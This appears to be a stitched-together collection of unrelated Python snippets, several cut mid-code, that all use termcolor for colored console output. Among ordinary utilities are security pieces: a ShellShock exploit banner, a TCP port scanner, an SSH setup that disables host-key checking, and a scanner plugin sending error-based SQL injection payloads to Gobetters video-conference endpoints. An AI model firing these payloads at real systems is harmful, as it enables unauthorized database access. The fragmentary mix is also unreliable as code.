def history(): cl = subprocess.call("clear") cprint ("\nWork History:", 'green', attrs=['bold']) cprint (" Your looking at. This is a project to highlight some of my abilities. I\n also have more projects that can be seen on git hub at\n https://github.com/kinsei/", 'green') main_menu = raw_input(colored("\n\n\n\n\n\n\n\n\n\n\n\n\n\nWould you like to see more? (y/n):\n\n>>> ", 'green', attrs=['bold'])) if main_menu == "n": cl main.menu() elif main_menu == "no": cl main.menu() elif main_menu == "No": cl main.menu() elif main_menu == "y": cl more.more() elif main_menu == "yes": cl more.more() elif main_menu == "Yes": cl more.more() else: cl main.menu()
def print_screen_log(name): head = "\n****----" tail = "----****" if name == 'initTestServices': text = head + "Initializing Traffic Generator"+tail elif "create_private_sessionDir" == name : text =head + "Setting up user session" + tail elif name == '__onboard__' : text = head+'Onboarding service Template'+tail elif name == 'register' : text = head+'Registering Event Framework'+tail elif name == '__create_service__' : text = head+'Triggering Service Creation'+tail elif name == 'deleteService' : text = head+'Cleanup - Deleting Service'+tail elif name =='create_pdf' : text = head+'Reporting results'+tail elif name == 'deleteTemplate' : text = head+"Deleting Service Template"+tail else : #text = head + " " + name + " " + tail #cprint(text,'red',attrs=['underline']) ##print text #(text,'red',on_color='on_grey',attrs=['bold']) return cprint(text,'green',on_color='on_blue',attrs=['bold'])
def _make_context(): """ Return context dict for a shell session so one can access stuff without importing it explicitly. """ context_dict = {'app': app, 'db': db, 'logsql': logsql, 'func': func} def print_name(name, desc): name = colored(name, 'blue', attrs=['bold']) print(' {:15s} - {}'.format(name, desc)) cprint('Names already imported to the shell (by `_make_context`):', 'yellow', attrs=['bold']) print_name('app', 'Flask application') print_name('db', 'flask.sqlalchemy database object') print_name('func', 'sqlalchemy.func') print_name('logsql', 'utility function to enable/disable logging of SQLAlchemy SQL queries') # Imports models from specified modules from application import models cprint('Models:', 'yellow', attrs=['bold']) for attr_name in dir(models): attr = getattr(models, attr_name) if inspect.isclass(attr) and issubclass(attr, db.Model): context_dict[attr.__name__] = attr print_name( attr.__name__, 'imported from ' + colored(models.__name__ + '.' + attr.__name__, 'green') ) return context_dict
def svn_command(subcommand, *args): command = ['svn', '--non-interactive'] # if not local_cache: # command.append('--no-auth-cache') command.append('--no-auth-cache') if trust_cert: command.append('--trust-server-cert') command.append(subcommand) if not verbose and subcommand not in ('info', 'cleanup'): command.append('-q') command.extend(args) if verbose: if '--username' in command or '--password' in command: filtered_command = [] for i in range(len(command)): # remove username and password from logging user_pass = ('--username', '--password') if command[i] in user_pass or \ (i > 0 and command[i - 1] in user_pass): continue filtered_command.append(command[i]) cprint('>>> ' + ' '.join(filtered_command), 'cyan') else: cprint('>>> ' + ' '.join(command), 'cyan') if subprocess.call(command) != 0: raise SVNError(subcommand)
def linecount(self): count = 0 for x in enumerate(self.file): count = count + 1 message = 'Counting '+str(count) cprint('\r%s' % message,'green',end='') return count
def display(filter_items=None, extra=None): """ Display all diary entries and info as a table on the screen. :param filter_items: List which specifies items to be displayed. Will default to all entries. :param extra: Extra text to be displayed after the table. :return: None. """ filter_mode = filter_items is not None items = filter_items if filter_mode else diary.entries os.system('cls' if os.name == 'nt' else 'clear') # For Windows/Mac/Linux compatibility if not items: message = 'No entries match these criteria\n' if filter_mode else 'Diary has no entries\n' cprint(message, 'yellow') if extra is not None: print(extra + '\n') return table = create_table(items, filter_mode) # Get current terminal height so it is not changed. This allows proper functioning when in full screen mode on mac. rows = os.popen('stty size', 'r').read().split()[0] sys.stdout.write("\x1b[8;{rows};{cols}t".format(rows=rows, cols=max((len(table.split('\n')[1])), 80))) # Resize window print(table + '\n') # Newline after table is more aesthetically pleasing. if extra is not None: print(extra + '\n')
def print_path(url): resp = requests.get(url) respjson= simplejson.loads(resp.text) checkresp(respjson, resp) keypoints = respjson['routes'][0]['legs'][0] print "From: " + keypoints['start_address'] print "To: " + keypoints['end_address'] print "Distance: " + keypoints['distance']['text'] print "Duration: " + keypoints['duration']['text'] printwarnings(respjson) if 'mode=transit' in url: print keypoints['departure_time']['text'] + ' to ' + keypoints['arrival_time']['text'] steps, linenum = keypoints['steps'], 1 for step in steps: instruction = sanitize(step['html_instructions']) #fix for formatting issue on last line of instructions instruction = re.sub('Destination', '. Destination', instruction) sys.stdout.write(str(linenum) + '. ' + instruction + ': ') cprint(step['duration']['text'], 'green') linenum += 1
def extract_proxy_data(doc, namespace_spec_url): """Extracts the data from an already parsed (also use deepcopy) XML doc. Returns a list of dictionaries of five strings containing the 'ip', 'port', 'country', 'timestamp', and 'whois'.""" namespaces = {'prx': namespace_spec_url} proxies = [] try: for i in doc.iterfind('channel/item/prx:proxy', namespaces): ip = i.find('prx:ip', namespaces) port = i.find('prx:port', namespaces) timestamp = i.find('prx:check_timestamp', namespaces) if timestamp == None: # make fault tolerant timestamp = copy(ip) timestamp.text = 'Unknown' country = i.find('prx:country', namespaces) if country == None: country = i.find('prx:country_code', namespaces) if country == None: country = copy(ip) country.text = 'Unknown' proxy = {'ip':ip.text, 'port':port.text, 'country':country.text, 'timestamp':timestamp.text, 'whois':'Unknown'} proxies.append(proxy) except Exception as e: cprint('[-] Error processing XML feed %s!' % doc, 'red') cprint('[-] Error: %s' % e, 'yellow') quit() return proxies
def _run_action(args): defaulted_components = False components = settings.parse_components(args.pop("components")) if not components: defaulted_components = True components = _get_def_components() action = _clean_action(args.pop("action")) if not action: cprint("No valid action specified!", "red") return False rootdir = args.pop("dir") if rootdir is None: cprint("No root directory specified!", "red") return False #ensure os/distro is known (distro, platform) = utils.determine_distro() if distro is None: print("Unsupported platform " + colored(platform, "red") + "!") return False #start it (rep, maxlen) = utils.welcome(_WELCOME_MAP.get(action)) header = utils.center_text("Action Runner", rep, maxlen) print(header) #need to figure out dependencies for components (if any) ignore_deps = args.pop('ignore_deps', False) if not defaulted_components: LOG.info("Activating components [%s]" % (", ".join(sorted(components.keys())))) else: LOG.info("Activating default components [%s]" % (", ".join(sorted(components.keys())))) if not ignore_deps: new_components = settings.resolve_dependencies(components.keys()) component_diff = new_components.difference(components.keys()) if component_diff: LOG.info("Having to activate dependent components: [%s]" % (", ".join(sorted(component_diff)))) for new_component in component_diff: components[new_component] = list() component_skips = _check_roots(action, rootdir, components.keys()) for c in component_skips: components.pop(c) if not components: LOG.error("After checking the various components roots, no components ended up being specified!") return False #get the right component order (by priority) component_order = settings.prioritize_components(components.keys()) if action in _REVERSE_ACTIONS: #reverse them so that we stop in the reverse order #and that we uninstall in the reverse order which seems to make sense component_order.reverse() #add in any that will just be referenced but which will not actually do anything (ie the action will not be applied to these) ref_components = settings.parse_components(args.pop("ref_components")) for c in ref_components.keys(): if c not in components: components[c] = ref_components.get(c) #now do it! LOG.info("Starting action [%s] on %s for distro [%s]" % (action, date.rcf8222date(), distro)) results = _run_components(action, component_order, components, distro, rootdir, args) LOG.info("Finished action [%s] on %s" % (action, date.rcf8222date())) if results: LOG.info('Check [%s] for traces of what happened.' % ", ".join(results)) return True
def banner(): cprint(''' ▄████████ ▄█ █▄ ▄█ ▄█ ███ ▄██████▄ ▄██████▄ ▄█ ███ ███ ███ ███ ███ ███ ▀█████████▄ ███ ███ ███ ███ ███ ███ █▀ ███ ███ ███▌ ███ ▀███▀▀██ ███ ███ ███ ███ ███ ▄███▄▄▄ ███ ███ ███▌ ███ ███ ▀ ███ ███ ███ ███ ███ ▀▀███▀▀▀ ███ ███ ███▌ ███ ███ ███ ███ ███ ███ ███ ███ █▄ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███▌ ▄ ███ ███ ███ ███ ███ ███▌ ▄ ██████████ ▀██████▀ █▀ █████▄▄██ ▄████▀ ▀██████▀ ▀██████▀ █████▄▄██ ▀ ▀ ▄████████ ▄█ █▄ ▄████████ ▄█ ▄█ ▄████████ ▄█ █▄ ▄██████▄ ▄████████ ▄█ ▄█▄ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ▄███▀ ███ █▀ ███ ███ ███ █▀ ███ ███ ███ █▀ ███ ███ ███ ███ ███ █▀ ███▐██▀ ███ ▄███▄▄▄▄███▄▄ ▄███▄▄▄ ███ ███ ███ ▄███▄▄▄▄███▄▄ ███ ███ ███ ▄█████▀ ▀███████████ ▀▀███▀▀▀▀███▀ ▀▀███▀▀▀ ███ ███ ▀███████████ ▀▀███▀▀▀▀███▀ ███ ███ ███ ▀▀█████▄ ███ ███ ███ ███ █▄ ███ ███ ███ ███ ███ ███ ███ ███ █▄ ███▐██▄ ▄█ ███ ███ ███ ███ ███ ███▌ ▄ ███▌ ▄ ▄█ ███ ███ ███ ███ ███ ███ ███ ███ ▀███▄ ▄████████▀ ███ █▀ ██████████ █████▄▄██ █████▄▄██ ▄████████▀ ███ █▀ ▀██████▀ ████████▀ ███ ▀█▀ ▀ ▀ ▀ ''','red') cprint('[+] - Author: Matheus Bernardes','red') cprint('[+] - Nick: G4mbler','red') cprint('[+] - Vulnerability Description','red') cprint(''' GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix. ''','red')
def fix(self): """clowder fix command""" if self.clowder_repo is not None: cprint('Fix...\n', 'yellow') self.clowder.fix_version(self.args.version) else: exit_clowder_not_found()
def git_create_repo(url, repo_path, remote, ref, depth=0): """Clone git repo from url at path""" if not os.path.isdir(os.path.join(repo_path, '.git')): if not os.path.isdir(repo_path): os.makedirs(repo_path) repo_path_output = colored(repo_path, 'cyan') try: print(' - Clone repo at ' + repo_path_output) Repo.init(repo_path) except: cprint(' - Failed to initialize repository', 'red') print('') shutil.rmtree(repo_path) sys.exit(1) else: repo = _repo(repo_path) remote_names = [r.name for r in repo.remotes] remote_output = colored(remote, 'yellow') if remote not in remote_names: try: print(" - Create remote " + remote_output) repo.create_remote(remote, url) except: message = colored(" - Failed to create remote ", 'red') print(message + remote_output) print('') shutil.rmtree(repo_path) sys.exit(1) _checkout_ref(repo_path, ref, remote, depth)
def moveEpisodeDir(self, dname, possibleShowName): source = os.path.join(self.SortConfig.TvDir, dname) target = os.path.join(self.SortConfig.TvDir, possibleShowName) shutil.move(source, target) cprint('Moved ' + dname + ' to ' + target, 'red') self.fixSymlink(dname, target)
def respondToHandshake(self, NodeId, ListeningPort, ProtocolVersion): ip = self.transport.getPeer().host d = Mercury.checkIfNodeExists(NodeId) def processNode(nodeExists): if nodeExists: return Mercury.updateAndGetNode(NodeId, ip, ListeningPort) # This returns deferred else: return Mercury.createNode(NodeId, ip, ListeningPort) d.addCallback(processNode) def callReverseSync(node): # I'm going to ask for nodes in parallel with already existing header call. d = self.requestHeaders(node) d.addCallback(self.requestNodes) return node d.addCallback(callReverseSync)\ .addErrback(self.closeConnection, 'INBOUND', callReverseSync.__name__) d.addCallback(self.setGlobalConnectedNode) # This is at one level up, directly below protocol class. reply = {'NodeId': self.factory.localNodeId, 'ListeningPort': aetherListeningPort, 'ProtocolVersion': protocolVersion } cprint('FROM REMOTE: HANDSHAKE REQUEST: from %s:%s' %(ip, ListeningPort), 'white', 'on_yellow', attrs=['bold']) cprint('ANSWER: %s' %(reply), 'white', 'on_yellow') print('\n') return reply
def validate_users(self): self.app.log.debug('Validating GitHub account names.') # validate required config parameters if not self.app.config.get('github', 'auth_token') or not self.app.config.get('github', 'auth_id'): raise error.ConfigError("Missing config parameter 'github.auth_id' and/or 'github.auth_token'! " "Please run 'scrum-tools github authorize' first! ") key_username = self.app.config.get('core', 'users_schema_key_username') key_github = self.app.config.get('core', 'users_schema_key_github') user_repository = data.UserRepository(self.app.config) gh = login(token=self.app.config.get('github', 'auth_token')) for u in user_repository.users(): if not u[key_github]: cprint("Skipping empty GitHub account for user '%s'." % u[key_username], 'yellow', file=sys.stdout) continue print colored("Validating GitHub account '%s' for user '%s'..." % (u[key_github], u[key_username]), 'green'), try: if gh.user(u[key_github]): print colored('OK', 'green', attrs=['bold']) else: raise RuntimeError("Github user '%s' not found" % u[key_github]) except RuntimeError: print colored('Not OK', 'red', attrs=['bold'])
def scenario_rundown(scenario): steps = world.scenarios[scenario.name] for step in steps: if step in world.untried_steps or step in world.failed_steps: cprint(u'\u2503'+" ", 'cyan', attrs=['bold']) print "" cprint(u'\u2503'+" ", 'cyan', attrs=['bold'], end="") cprint(" -SCENARIO-FAILED: "+str(scenario.name), 'red') step_stepper(steps) # for step in steps: # if step.failed: # cprint(" "+str(step.described_at.line)+"**"+ str(step.sentence), 'red') # world.focus = True # elif step.passed: # cprint(" "+str(step.described_at.line)+" "+str(step.sentence), 'green') # else: # cprint(" "+str(step.described_at.line)+"**" + str(step.sentence), 'yellow') # world.focus = True # print "" return else: # step_stepper(steps) pass if not world.focus: cprint(u'\u2503'+" ", 'cyan', attrs=['bold'], end="") cprint(" -SCENARIO-PASSED: "+str(scenario.name), 'green')
def initiateHandshake(self): cprint('ASKING FOR: HANDSHAKE to %s:%s' %(self.transport.getPeer().host, self.transport.getPeer().port), 'cyan', 'on_blue', attrs=['bold']) def replyArrived(reply): cprint('RECEIVED: HANDSHAKE REPLY. \n%s' %(reply), 'cyan', 'on_blue') print('\n') ip = self.transport.getPeer().host d = Mercury.checkIfNodeExists(reply['NodeId']) def processNode(nodeExists): if nodeExists: return Mercury.updateAndGetNode(reply['NodeId'], ip, reply['ListeningPort']) # This returns deferred else: return Mercury.createNode(reply['NodeId'], ip, reply['ListeningPort']) d.addCallback(processNode) d.addCallback(self.setGlobalConnectedNode) # This is at one level up, directly below protocol class. d.addCallback(self.requestHeaders) d.addCallback(self.requestNodes) self.callRemote(networkAPI.Handshake, NodeId=self.factory.localNodeId, ListeningPort=aetherListeningPort, ProtocolVersion=protocolVersion)\ .addCallback(replyArrived)\ .addErrback(self.closeConnection, 'OUTBOUND', self.initiateHandshake.__name__)
def success(cls, message): """Prints the specified message with green text as well as to a file. Args: message: A str representing the message to log. """ cprint(message, 'green')
def check_env(self, verbose=True): def exit_if(condition, msg): if condition: print(colored(msg, "red")) sys.exit(1) if verbose: cprint("Config settings: ", "yellow") if not self.isfile("uberdoc.cfg"): print("No project specific config file. Using defaults.") self.conf.show() print("Document version: " + self.version()) exit_if( not distutils.spawn.find_executable(self.conf["pandoc_cmd"]), "Error: Couldn't find pandoc in current path.") exit_if( not distutils.spawn.find_executable("git"), "Error: Couldn't find git in current path.") exit_if( not path.isdir(self.in_dir), "Error: Couldn't find input folder. Was expecting folder: " + self.in_dir) toc_file_path = self.prefix_path( self.conf["in_dir"], self.conf["toc_filename"]) exit_if( not path.isfile(toc_file_path), "Error: Couldn't find toc file. Was expecting: " + toc_file_path) if verbose: cprint("Environment setup ok.", "green")
def importScoresByNames(self, scores, assessmentId = 0, exactGradesourceNames = False): if assessmentId == 0: assessmentId = self.chooseAssessment() GsNameToStudentId, postData = self.parseScoresForm(assessmentId) utils.check("Gradesource name -> studentId: ", GsNameToStudentId) errors = False if not exactGradesourceNames: ExtNameToGsName = self.matchNames(scores.keys(), GsNameToStudentId.keys()) for extName, GsName in ExtNameToGsName.items(): postData[GsNameToStudentId[GsName]] = scores[extName] else: for GsName, score in scores.items(): if GsName in GsNameToStudentId: postData[GsNameToStudentId[GsName]] = score else: cprint('Missing name: ' + GsName, 'white', 'on_red') errors = True if errors: sys.exit() utils.check("Data to post: ", postData) self.postScores(postData) cprint("Go to %s" % (self.assessmentUrl % assessmentId), 'yellow')
def warn(cls, message): """Prints the specified message with red text as well as to a file. Args: message: A str representing the message to warn the user with. """ cprint(message, 'red')
def configure(self,data): try: def keys(data): call(['touch',data['home_dir']+'/.ssh/authorized_keys']) call(['chmod','600',data['home_dir']+'/.ssh/authorized_keys']) call(['touch',data['home_dir']+'/.ssh/id_rsa']) call(['chmod','400',data['home_dir']+'/.ssh/id_rsa']) def permission(data): call(['chmod','-R','700',data['home_dir']+'/.ssh']) def ownership(data): call(['chown','-R',data['name']+':'+data['name'],data['home_dir']+'/.ssh']) def settings(data): call(['touch',data['home_dir']+'/.ssh/config']) config_path = data['home_dir']+'/.ssh/config' if os.path.isfile(config_path): config_file = open(config_path,'wt') config_file.write('Host *\n\tStrictHostKeyChecking no\n') config_file.close() ssh_dir = call(['mkdir',data['home_dir']+'/.ssh']) if ssh_dir!=0: raise permission(data) keys(data) settings(data) ownership(data) except Exception as Error: self.remove(data) cprint('Error configuring Identity.','red') sys.exit(1)
def wiki_geosearch(option, opt_str, value, parser): """ used to find out what happend at a certain location or in the range of radius """ length = len(parser.rargs) global geosearch_res [latitude, longtitude, radius] = [0] * 3 if length < 2: parser.error(colored("option -g needs at least 2 arguments!", "red", attrs=["bold"])) elif length > 3: parser.error(colored("option -g can't handle more than 3 arguments!", "red", attrs=["bold"])) elif length == 2: [latitude, longtitude] = parser.rargs[:] else: [latitude, longtitude, radius] = parser.rargs[:] try: geosearch_res = geosearch(latitude, longtitude, radius=radius) except WikipediaException: parser.error( colored( "An unknown error occured: 'Invalid coordinate provided'. Please report it on GitHub!", "red", attrs=["bold"], ) ) exit(1) for res in geosearch_res: cprint(res + "\n", "green")
def affiche_grille(grille, largeur, longueur): global printed_pause global pause ###Bouge le curseur au dessus et affiche score ### cprint("\033[;H Score: {} ".format(score.value), 'white', 'on_cyan', ['bold']) # on utilise "\033[;H" pour remettre le curseur au dessus car la commande "clear" est trop lente # => overwrite ### Affichage matrice ### border = colored('+', 'yellow', 'on_yellow') print(border * (longueur * 2 + 4)) for i in range(largeur): print(border * 2, end="") for j in range (longueur): print(grille[i][j], end=grille[i][j]) print(border * 2) print(border * (longueur * 2 + 4)) ## Si c'est finit ou pausé if game_over.value == True: print("Game Over") print("Réessayez ?[o/n]\n") if pause.value == True and printed_pause.value == False: print("Paused") printed_pause.value = True else: print(" ") ### Pour cacher le mot "Paused" => overwrite
def PrintMainUI(): text = colored("Task List", "grey", "on_white") print ">" * 10 + text + "<" * 10 print "\n1. Settings" print "2. Data Management" print "3. Machine Control" cprint("4. Quit\n", "magenta")
def help_print(self): """Display the docstrings for all commands""" for command in self.commands.items(): termcolor.cprint(command[0], attrs=['bold']) print(" " + command[1].__doc__ + '\n') self.titlebar = "Showing documentation" return len(self.commands)*3
def _TCP_multiple(self): try: mysock = create_tcp_socket(self.to,'conn') try: with self.lock: self.c+=1 d=mysock.connect_ex((self.tgt,self.port)) if d == 0: with self.lock: self.c+=1 serv = getportserv(self.port) if self.quite == True: data=(str(self.port),'open',serv) p.put(data) else: print str(self.port).ljust(7)+'open'.ljust(7)+serv except KeyboardInterrupt: sys.exit(cprint('[-] Canceled by user','red')) finally: pass except KeyboardInterrupt: sys.exit(cprint('[-] Canceled by user','red')) except: pass finally: pass
def test_stop(stop_name): """Run a series of tests on the command-line for the given stop name.""" # Make sure we don't have more than one consecutive blank in the stop name. stop_name = re.sub(" +", " ", stop_name) # Use ' ' in strings below to allow single blanks in stop names. examples = """ --help --stop %(stop_name)s --stop %(stop_name)s --header --stop %(stop_name)s --tablefmt rst --stop %(stop_name)s --num-line-groups 2 --stop %(stop_name)s --num-line-groups 2 --filter-line U """ % { "stop_name": stop_name.encode("utf-8") } # --stop Bahnhof --header --filter-name "(Potsdam)" # fails examples = examples.strip().split("\n") for example in examples: prog = join(os.getcwd(), sys.argv[0]) cmd = "%s %s %s" % (sys.executable, prog, example.strip()) termcolor.cprint(cmd, attrs=["bold"]) ## todo: print("") subprocess.check_call(cmd.decode("utf-8").split(" ")) print("")
def make_url(parser, options, args, printInfo=True): checkinput(options) url_end = '' for key,value in options.__dict__.items(): if(value != None): if key in ["departure_time", "arrival_time"]: try: value = int(value) except ValueError as e: value = int(mktime(cal.parse(value)[0])) finally: time = value value = str(value) if not (isinstance(value, bool) or isinstance(value, int)): re.sub(' ', '+', value) url_end += key + '=' + value + '&' origin = re.sub(' ', '+', args[1]) destination = re.sub(' ', '+', args[2]) if not options.nourl : cprint (_("To view these directions online, follow this link: ") + "http://mapof.it/" + origin + '/' + destination, 'cyan') base_url = 'http://maps.googleapis.com/maps/api/directions/json?origin=' + origin + '&destination=' + destination + '&' url = (base_url + url_end)[:-1] while True: val =print_path(url,printInfo,options.mode , int(options.width)) if val > 0: return val
def display_cell(cell, agents): # display height if cell['color'] is not NONE_COLOR: if cell['h']<0: cprint('%d\t\t' % cell['h'], cell['color'], end='') if cell['h']==0: cprint(' %d\t\t' % cell['h'], cell['color'], end='') return if cell['h'] < 0: # hole print('%d' % cell['h']), elif cell['h'] == 0: # tile print(' %d' % cell['h']), else: # obstacle print(' #'), #display tiles if cell['tiles']: for tile in cell['tiles']: cprint('*', tile, end='') # display agent for agent in agents: if agent.x == cell['x'] and agent.y == cell['y']: cprint(',%d$' % agent.points, agent.color, end='') if agent.carry_tile: cprint('* ', agent.carry_tile, end='') print('\t\t'),
def docker_copy_file_out(self, src, dest): cprint( "[" + self.hostname + "][Docker]: copy file from docker " + src + " --> " + dest + ".", self.__output_color) self.run(['sudo'] + self.__docker.copy_file_out(src, dest))
"closed": "red", "merged": "purple", "declined": "blue" } organization_name = "pagarme" repository_name = "pagarme-core" repository_path = f"{organization_name}/{repository_name}" issue_number_list = [655, 599, 597, 488, 939] # strip colors if stdout is redirected init(strip=not sys.stdout.isatty()) text = "Issues" cprint(figlet_format(text, font='banner3'), 'green', 'on_blue', attrs=['bold']) access_info = opsutils.load_access_information(look_at="home") github_token = access_info["github"]["token"] access_info = opsutils.load_access_information(look_at="home") slack_token = access_info["slack"]["token"] Slack = opsutils.Slack(slack_token) channel_name = "ops-issues" filename = "last_update.csv" ##################### # MAIN # #####################
# file_name = input(colored('Укажите имя файла: ', color='magenta')) # cprint('Argentina', color='cyan') f_users = open('resources/e1_users - users.csv') f_users.readline() # пропуск первой строки с метаданными таблицы countries = set() # for line in f_users.readlines(): # countries.add(line.split(',')[6].strip()) # решить с помощью генератора (то есть "заменить" цикл конструкцией в []) [countries.add(line.split(',')[6].strip()) for line in f_users.readlines()] f_users.close() # for country in countries: # index = random.randrange(0, len(colours)) # cprint(country, color=colours[index]) # пример решения с помощью генератора [cprint(country, color=choice(colours)) for country in countries] ''' Документация: https://pypi.org/project/termcolor/ Примеры использования: https://www.programcreek.com/python/example/78943/termcolor.colored Чтобы эту библиотеку установить, нужно в консоли выполнить команду: pip install termcolor Или через настройки PyCharm: https://clck.ru/Ngn8D '''
def search(rooms, courses, course_names, students, matrix): """ Searches for painpoints in the case. """ student_numbers = [student.student_number for student in students] student_weakness = [0 for number in student_numbers] course_weakness = [0 for coursename in course_names] for i in range(100): # schedule day_sch.total_schedule(rooms, courses, course_names, matrix) # calculate score and apply hillclimber score = sc.matrix_checker(courses, course_names, matrix) + sc.order_checker(courses) score += sc.student_checker(rooms, courses, course_names) bonus, malus = sc.distribution_checker(courses) score += bonus + malus score += sc.evening_checker(rooms, courses, course_names) score = hill.random_climber(courses, rooms, course_names, 1000, score, matrix) # schedule students stu.distribute_all_students(students, rooms, courses, course_names) # save score for hillclimber student_bonus, student_malus = sc.student_score(students) student_score = student_bonus + student_malus # pre filter the relevant courses student_courses = [] for course in courses: poss_group_ids = [] for activity in course.activities: if activity.group_id not in poss_group_ids and activity.group_id != "x": poss_group_ids.append(activity.group_id) if len(poss_group_ids) > 1: student_courses.append([course, poss_group_ids]) # student hillclimber student_climb_score = sthl.students_hillclimber( student_courses, students, student_score, 100) # update statistics for course in courses: if course.goodbad < 0: course_weakness[course_names.index(course.name)] += 1 for student in students: if student.goodbad < -12: student_weakness[student_numbers.index( student.student_number)] += 1 bas_sch.print_schedule(rooms) bas_sch.clear_schedule(rooms, courses) bas_sch.clear_students(students) cprint(i, "blue") # print painpoints for f in range(len(student_numbers)): print(student_numbers[f] + ":", student_weakness[f]) for j in range(len(course_names)): print(course_names[j] + ":", course_weakness[j])
) cprint("successful", "green") except urllib.error.HTTPError: cprint("failed", "yellow") download_errors.append(i + 1) continue cprint("download complete", "blue") cprint(f"successful: {len(results) - len(download_errors)} images", "blue") if download_errors: cprint(f"failed: {len(download_errors)} images", "yellow") if __name__ == "__main__": cprint("-" * 50, "magenta") cprint((f"Image Collector v{__version__}").center(50), "magenta") cprint("-" * 50, "magenta") parser = argparse.ArgumentParser( argument_default=argparse.SUPPRESS, description=f"Image Collector v{__version__}", ) parser.add_argument("-t", "--target", help="target name", type=str, required=True) parser.add_argument("-n", "--number", help="number of images",
def install_python_interpreter(self): """ Install the base python interpreter. This needs to be created before the virtualenv can be created. """ cprint("Checking for base python interpreter", "yellow") sp.check_call("pyenv install -s " + self.runtime.version, shell=True)
import json import termcolor from pathlib import Path # -- Read the json file jsonstring = Path("person_3.json").read_text() # Create the object person from the json string person = json.loads(jsonstring) # Person is now a dictionary. We can read the values # associated to the fields 'Firstname', 'Lastname' and 'age' # Print the information on the console, in colors print() termcolor.cprint("Name: ", 'green', end="") print(person['Firstname'], person['Lastname']) termcolor.cprint("Age: ", 'green', end="") print(person['age']) # Get the phoneNumber list phoneNumbers = person['phoneNumber'] # Print the number of elements in the list termcolor.cprint("Phone numbers: ", 'green', end='') print(len(phoneNumbers)) # Print all the numbers for i, num in enumerate(phoneNumbers): termcolor.cprint(" Phone {}:".format(i), 'blue')
def start_docker(self, exec_cmd): cprint("[" + self.hostname + "]: start docker container.", self.__output_color) self.run(['sudo'] + self.__docker.start_docker(exec_cmd))
def set_hostname(self): cprint("[" + self.hostname + "]: set hostname.", self.__output_color) cmd = ["sudo hostname", self.hostname] self.run(cmd)
def docker_copy_file(self, src, dest): cprint( "[" + self.hostname + "][Docker]: copy file to docker " + src + " --> " + dest + ".", self.__output_color) self.run(['sudo'] + self.__docker.copy_file(src, dest)) self.run(['sudo'] + self.__docker.update_file_ownership(dest))
errorString = [ self.outString + " ", f"Was not able to access '{self.sl}'" ] if last: fileString = self.outString + "│ └─ " else: fileString = self.outString + "│ ├─ " if not self.outFile: if (type == "dir"): cprint(string, "blue") elif (type == "file"): cprint(colored(fileString, "blue") + colored(string, "green")) else: cprint( colored(errorString[0], "blue") + colored(errorString[1], "red")) else: if (type == "dir"): self.outFile.write(string + "\n") elif (type == "file"): self.outFile.write(fileString + string + "\n") else: self.outFile.write(errorString[0] + errorString[1] + "\n") if __name__ == "__main__": root = direc(os.getcwd(), 0) cprint(root, "yellow") root.searchDir()
def get_docker_img(self, nodes): cprint("[" + self.hostname + "]: pull docker image in parallel.", self.__output_color) self.parallel_run(['sudo'] + self.__docker.get_docker_img(), nodes)
def run(self): headers = { "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" } payloads = [ "/web/seeserver.php?machineid=1'AND (SELECT 6632 FROM(SELECT COUNT(*),CONCAT(0xc,(MID((IFNULL(CAST(Md5(1234) AS CHAR),0x20)),1,50)),0x7c,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '1'='1", "/web/department/deptsave.php?deptid=1 AND (SELECT 3593 FROM(SELECT COUNT(*),CONCAT((MID((IFNULL(CAST(Md5(1234) AS CHAR),0x20)),1,50)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&ac=del&level=0&parentid=0&dm=root", "/web/android/dept.php?lan=1&deptcode=1'AND (SELECT 7173 FROM(SELECT COUNT(*),CONCAT((MID((IFNULL(CAST(Md5(1234) AS CHAR),0x20)),1,50)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '1'='1", "/web/c/index.php?deptcode=1'AND (SELECT 7173 FROM(SELECT COUNT(*),CONCAT((MID((IFNULL(CAST(Md5(1234) AS CHAR),0x20)),1,50)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '1'='1", "/web/onelanding/onelanding.php?username=1&deptcode=1'AND (SELECT 7173 FROM(SELECT COUNT(*),CONCAT((MID((IFNULL(CAST(Md5(1234) AS CHAR),0x20)),1,50)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '1'='1", "/web/systemconfig/guangbo.php?id=12 AND (SELECT 5848 FROM(SELECT COUNT(*),CONCAT((MID((IFNULL(CAST(Md5(1234) AS CHAR),0x20)),1,50)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&action=del&page=", "/web/device/dept.php?deptcode=1'AND (SELECT 7173 FROM(SELECT COUNT(*),CONCAT((MID((IFNULL(CAST(Md5(1234) AS CHAR),0x20)),1,50)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '1'='1", "/web/users/depttree.php?deptid=-7276 OR ROW(1355,6771)>(SELECT COUNT(*),CONCAT((MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,50)),FLOOR(RAND(0)*2))x FROM (SELECT 8443 UNION SELECT 5201 UNION SELECT 3389 UNION SELECT 2860)a GROUP BY x)", "" ] try: for payload in payloads: vulnurl = self.url + payload req = requests.get(vulnurl, headers=headers, timeout=10, verify=False) if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text: cprint( "[+]存在Gobetters视频会议系统SQL注入漏洞...(高危)\tpayload: " + vulnurl, "red") return True, vulnurl, "Gobetters视频会议系统SQL注入漏洞", payload, req.text vulnurl = self.url + "/web/users/usersave.php" post_data = { "from": "123", 